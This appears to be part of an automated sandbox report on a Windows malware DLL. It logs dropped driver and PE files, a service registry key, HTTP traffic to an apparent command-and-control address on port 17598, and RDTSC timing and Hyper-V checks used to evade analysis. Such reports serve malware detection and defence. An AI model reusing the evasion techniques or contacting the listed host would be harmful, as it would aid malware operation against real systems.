Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xz[1]
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[2]
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1]
Source: C:\Windows\SysWOW64\rundll32.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\1341001C

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 6E095961 second address: 6E095972 instructions: 0x00000000 rdtsc 0x00000002 cmp di, ax 0x00000005 mov dword ptr [ebp-2Ch], 45303030h 0x0000000c xchg dx, cx 0x0000000f rcr ch, cl 0x00000011 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 6E095972 second address: 6E09597F instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-28h], 00000001h 0x00000009 bsf ax, cx 0x0000000d rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 6E096F51 second address: 6E096F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esp 0x00000004 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 6E096F55 second address: 6E096F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 xchg dword ptr [esp+40h], eax 0x00000007 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E091E11 rdtsc 3_2_6E091E11
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1]
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2]
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xz[1]
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[2]
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1]
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1340820F.sys
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1341015D.sys
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: rundll32.exe, 00000003.00000002.2082938982.0000000000939000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2082938982.0000000000964000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2039142851.0000000000964000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2054642510.0000000000724000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2054642510.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt"

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E096F39 Start: 6E096F51 End: 6E096F5C 3_2_6E096F39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E095950 Start: 6E09597F End: 6E095972 3_2_6E095950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E091E11 rdtsc 3_2_6E091E11

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 134.175.236.132 17598
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",#1